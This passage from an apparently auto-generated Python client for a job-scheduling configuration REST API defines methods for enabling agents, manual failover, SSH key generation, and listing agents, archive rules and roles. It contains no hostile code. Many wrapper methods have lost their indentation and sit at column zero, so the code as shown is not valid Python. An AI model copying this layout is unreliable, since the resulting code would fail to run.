        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def enable_agent(self, server, agent, **kwargs):  # noqa: E501
    """Enable an Agent.

    This command does not install or configure the agent; it only
    enables an existing agent in the system.  This method makes a
    synchronous HTTP request by default.  To make an asynchronous HTTP
    request, pass ``async_req=True``:

    >>> thread = api.enable_agent(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the agent is connected too. (required)
    :param str agent: The Agent to be enabled. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # One delegation covers both the sync result and the async thread.
    return self.enable_agent_with_http_info(server, agent, **kwargs)  # noqa: E501
    def enable_agent_with_http_info(self, server, agent, **kwargs):  # noqa: E501
        """enable agent from the Server  # noqa: E501
        Enable an Agent. This command does not install or configure the agent. It only enable existing agent in the system.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.enable_agent_with_http_info(server, agent, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str server: The Server the agent is connected too. (required)
        :param str agent: The Agent to be enabled. (required)
        :return: SuccessData
        :raises ValueError: if `server` or `agent` is missing or None
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # parameters plus the common api_client pass-through options).
        all_params = ['server', 'agent'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, server, agent, kwargs) so all
        # parameters can be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method enable_agent" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `enable_agent`") # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `enable_agent`") # noqa: E501
        collection_formats = {}
        # Both values are substituted into the URL path template below.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server'] # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent'] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # POST with no request body; the path alone identifies the agent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/enable', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def failover(self, server, **kwargs): # noqa: E501
"""Perform Manual Failover on a specified Server # noqa: E501
Perform Manual Failover on a specified Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.failover(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.failover_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.failover_with_http_info(server, **kwargs) # noqa: E501
return data
    def failover_with_http_info(self, server, **kwargs):  # noqa: E501
        """Perform Manual Failover on a specified Server  # noqa: E501
        Perform Manual Failover on a specified Server  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.failover_with_http_info(server, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str server: (required)
        :return: SuccessData
        :raises ValueError: if `server` is missing or None
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # parameters plus the common api_client pass-through options).
        all_params = ['server'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, server, kwargs) so all
        # parameters can be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method failover" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `failover`") # noqa: E501
        collection_formats = {}
        # 'server' is substituted into the URL path template below.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server'] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # PUT with no request body; the path alone identifies the server.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/failover', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def generate_mft_rsa_ssh_key(self, body, server, agent, **kwargs): # noqa: E501
"""Generate RSA SSH Key # noqa: E501
Generate RSA SSH Key pair for SFTP account authentication # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_mft_rsa_ssh_key(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SshKeyProperties body: Ssh Key pair properites (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.generate_mft_rsa_ssh_key_with_http_info(body, server, agent, **kwargs) # noqa: E501
else:
(data) = self.generate_mft_rsa_ssh_key_with_http_info(body, server, agent, **kwargs) # noqa: E501
return data
    def generate_mft_rsa_ssh_key_with_http_info(self, body, server, agent, **kwargs):  # noqa: E501
        """Generate RSA SSH Key  # noqa: E501
        Generate RSA SSH Key pair for SFTP account authentication  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.generate_mft_rsa_ssh_key_with_http_info(body, server, agent, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param SshKeyProperties body: Ssh Key pair properites (required)
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :return: SuccessData
        :raises ValueError: if `body`, `server` or `agent` is missing or None
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # parameters plus the common api_client pass-through options).
        all_params = ['body', 'server', 'agent'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, body, server, agent, kwargs)
        # so all parameters can be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method generate_mft_rsa_ssh_key" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `generate_mft_rsa_ssh_key`") # noqa: E501
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `generate_mft_rsa_ssh_key`") # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `generate_mft_rsa_ssh_key`") # noqa: E501
        collection_formats = {}
        # 'server' and 'agent' are substituted into the URL path template.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server'] # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent'] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # The SshKeyProperties object is serialized as the request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/mft/ssh/key', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_agent_certificate_expiration_date(self, server, agent, **kwargs): # noqa: E501
"""Get certificate expiration date. # noqa: E501
Get the certificate expiration date of SSL configured Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_certificate_expiration_date(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:return: AgentCertificateExpirationData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_agent_certificate_expiration_date_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_agent_certificate_expiration_date_with_http_info(server, agent, **kwargs) # noqa: E501
return data
    def get_agent_certificate_expiration_date_with_http_info(self, server, agent, **kwargs):  # noqa: E501
        """Get certificate expiration date.  # noqa: E501
        Get the certificate expiration date of SSL configured Agent.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_agent_certificate_expiration_date_with_http_info(server, agent, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str server: The Server. (required)
        :param str agent: The Agent. (required)
        :return: AgentCertificateExpirationData
        :raises ValueError: if `server` or `agent` is missing or None
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # parameters plus the common api_client pass-through options).
        all_params = ['server', 'agent'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, server, agent, kwargs) so all
        # parameters can be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_agent_certificate_expiration_date" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_agent_certificate_expiration_date`") # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `get_agent_certificate_expiration_date`") # noqa: E501
        collection_formats = {}
        # Both values are substituted into the URL path template below.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server'] # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent'] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request; no body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/crt/expiration', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AgentCertificateExpirationData', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_agent_parameters(self, server, agent, **kwargs): # noqa: E501
"""get agent parameters # noqa: E501
Get all the parameters of the specified Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_parameters(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str agent: The name of the agent to query. (required)
:param bool extended_data: True to return more agent parameters. HIDDEN
:return: KeyValueListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_agent_parameters_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_agent_parameters_with_http_info(server, agent, **kwargs) # noqa: E501
return data
    def get_agent_parameters_with_http_info(self, server, agent, **kwargs):  # noqa: E501
        """get agent parameters  # noqa: E501
        Get all the parameters of the specified Agent.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_agent_parameters_with_http_info(server, agent, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str server: The Server the agent is connected to. (required)
        :param str agent: The name of the agent to query. (required)
        :param bool extended_data: True to return more agent parameters. HIDDEN
        :return: KeyValueListResult
        :raises ValueError: if `server` or `agent` is missing or None
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # parameters plus the common api_client pass-through options).
        all_params = ['server', 'agent', 'extended_data'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, server, agent, kwargs) so all
        # parameters can be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_agent_parameters" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_agent_parameters`") # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `get_agent_parameters`") # noqa: E501
        collection_formats = {}
        # Both values are substituted into the URL path template below.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server'] # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent'] # noqa: E501
        query_params = []
        # Optional flag; note the wire name is camelCase 'extendedData'.
        if 'extended_data' in params:
            query_params.append(('extendedData', params['extended_data'])) # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request; no body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/params', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='KeyValueListResult', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_agents(self, server, **kwargs): # noqa: E501
"""get Server agents # noqa: E501
Get all the agents of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agents(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. Optionally you can filter agent name of host or alias of the Agent (required)
:param str agent: Optionally case insensitive agent name filter of host or alias of the Agent. `ctm server:agents::get Server AgentName` returns all agents which names start with `agentname`
:return: AgentDetailsList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_agents_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_agents_with_http_info(server, **kwargs) # noqa: E501
return data
    def get_agents_with_http_info(self, server, **kwargs):  # noqa: E501
        """get Server agents  # noqa: E501
        Get all the agents of the specified Server.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_agents_with_http_info(server, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str server: The Server to query. Optionally you can filter agent name of host or alias of the Agent (required)
        :param str agent: Optionally case insensitive agent name filter of host or alias of the Agent. `ctm server:agents::get Server AgentName` returns all agents which names start with `agentname`
        :return: AgentDetailsList
        :raises ValueError: if `server` is missing or None
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # parameters plus the common api_client pass-through options).
        all_params = ['server', 'agent'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, server, kwargs) so all
        # parameters can be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_agents" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_agents`") # noqa: E501
        collection_formats = {}
        # 'server' goes in the path; the optional 'agent' filter goes in
        # the query string.
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server'] # noqa: E501
        query_params = []
        if 'agent' in params:
            query_params.append(('agent', params['agent'])) # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request; no body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/agents', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AgentDetailsList', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_all_archive_rules(self, **kwargs): # noqa: E501
"""Get all Workload Archiving rules # noqa: E501
Get all the Archiving rules # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_archive_rules(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ArchiveRulesList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_archive_rules_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_archive_rules_with_http_info(**kwargs) # noqa: E501
return data
    def get_all_archive_rules_with_http_info(self, **kwargs):  # noqa: E501
        """Get all Workload Archiving rules  # noqa: E501
        Get all the Archiving rules  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_archive_rules_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :return: ArchiveRulesList
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # This endpoint has no parameters of its own; only the common
        # api_client pass-through options are accepted.
        all_params = [] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, kwargs) so all parameters can
        # be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_archive_rules" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request; no body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/archive/rules', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ArchiveRulesList', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_all_authorization_roles(self, **kwargs): # noqa: E501
"""Get Authorization Roles # noqa: E501
Get Authorization Roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_authorization_roles(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: The Role name.
:param str description: The Role description.
:return: RoleHeaderList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_authorization_roles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_authorization_roles_with_http_info(**kwargs) # noqa: E501
return data
    def get_all_authorization_roles_with_http_info(self, **kwargs):  # noqa: E501
        """Get Authorization Roles  # noqa: E501
        Get Authorization Roles  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_authorization_roles_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str role: The Role name.
        :param str description: The Role description.
        :return: RoleHeaderList
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # optional filters plus the common api_client pass-through options).
        all_params = ['role', 'description'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, kwargs) so all parameters can
        # be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_authorization_roles" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        # Both filters are optional and sent as query-string parameters.
        query_params = []
        if 'role' in params:
            query_params.append(('role', params['role'])) # noqa: E501
        if 'description' in params:
            query_params.append(('description', params['description'])) # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request; no body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/authorization/roles', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='RoleHeaderList', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_all_organization_groups(self, **kwargs): # noqa: E501
"""Get All organization groups # noqa: E501
Get All organization groups # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_organization_groups(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str organizationgroup: The organization group name.
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_organization_groups_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_organization_groups_with_http_info(**kwargs) # noqa: E501
return data
    def get_all_organization_groups_with_http_info(self, **kwargs):  # noqa: E501
        """Get All organization groups  # noqa: E501
        Get All organization groups  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_organization_groups_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str organizationgroup: The organization group name.
        :return: list[str]
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # optional filter plus the common api_client pass-through options).
        all_params = ['organizationgroup'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, kwargs) so all parameters can
        # be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_organization_groups" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        # Optional filter, sent as a query-string parameter.
        query_params = []
        if 'organizationgroup' in params:
            query_params.append(('organizationgroup', params['organizationgroup'])) # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request; no body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
            '/config/authorization/organizationgroups', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[str]', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_all_roles_associated_with_organization_group(self, organizationgroup, **kwargs): # noqa: E501
"""Get Authorization Roles associated with an organization group # noqa: E501
Get Authorization Roles associated with an organization group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_roles_associated_with_organization_group(organizationgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str organizationgroup: Name of organization group (required)
:param str role: The Role name.
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, **kwargs) # noqa: E501
else:
(data) = self.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, **kwargs) # noqa: E501
return data
    def get_all_roles_associated_with_organization_group_with_http_info(self, organizationgroup, **kwargs):  # noqa: E501
        """Get Authorization Roles associated with an organization group  # noqa: E501
        Get Authorization Roles associated with an organization group  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str organizationgroup: Name of organization group (required)
        :param str role: The Role name.
        :return: list[str]
        :raises ValueError: if `organizationgroup` is missing or None
        :raises TypeError: if an unexpected keyword argument is passed
        If the method is called asynchronously,
        returns the request thread.
        """
        # Full set of argument names this endpoint accepts (its own
        # parameters plus the common api_client pass-through options).
        all_params = ['organizationgroup', 'role'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Snapshot the current locals (self, organizationgroup, kwargs) so
        # all parameters can be looked up uniformly by name below.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_roles_associated_with_organization_group" % key
                )
            params[key] = val
        # 'kwargs' itself is not a parameter; drop it after flattening.
        del params['kwargs']
        # verify the required parameter 'organizationgroup' is set
        if ('organizationgroup' not in params or
                params['organizationgroup'] is None):
            raise ValueError("Missing the required parameter `organizationgroup` when calling `get_all_roles_associated_with_organization_group`") # noqa: E501
        collection_formats = {}
        # 'organizationgroup' goes in the path; the optional 'role' filter
        # goes in the query string.
        path_params = {}
        if 'organizationgroup' in params:
            path_params['organizationgroup'] = params['organizationgroup'] # noqa: E501
        query_params = []
        if 'role' in params:
            query_params.append(('role', params['role'])) # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        # GET request; no body is sent.
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer'] # noqa: E501
        return self.api_client.call_api(
